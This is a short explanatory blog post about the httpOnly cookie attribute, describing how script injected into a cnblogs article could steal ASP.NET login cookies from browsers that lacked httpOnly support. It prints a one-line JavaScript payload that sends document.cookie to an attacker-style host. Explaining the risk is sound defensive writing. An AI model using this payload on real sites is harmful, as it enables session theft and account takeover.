Since IE6 SP1, Internet Explorer has supported the httpOnly attribute on cookies.
This attribute tells the browser that the cookie must not be accessible through window.document.cookie.
ASP.NET 2.0 supports the attribute as well, and it is specified in FormsAuthentication.
However, browsers such as Firefox do not support this attribute. So what are the consequences?
For example, suppose you log in to cnblogs (www.cnblogs.com) with Firefox and then open an article posted by a malicious user.
As you know, cnblogs.com lets users add arbitrary JavaScript.
That user can then obtain your cookie and, with one simple method, send it to his own database:
hiddenImg.src="http://hackyourlogininfo.com/savecookie.aspx?cookie="+escape(document.cookie)
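Of course, the information ASP.NET sends to the client is encrypted.
But someone else can simply forge the cookie, use it directly, and log in to cnblogs as you.
So if you log in to cnblogs or similar sites with Firefox, your account information can be stolen at any time.
If you use IE6 SP1 or IE7, however, the problem does not exist.
Because it supports httpOnly, document.cookie cannot retrieve the ASP.NET login information.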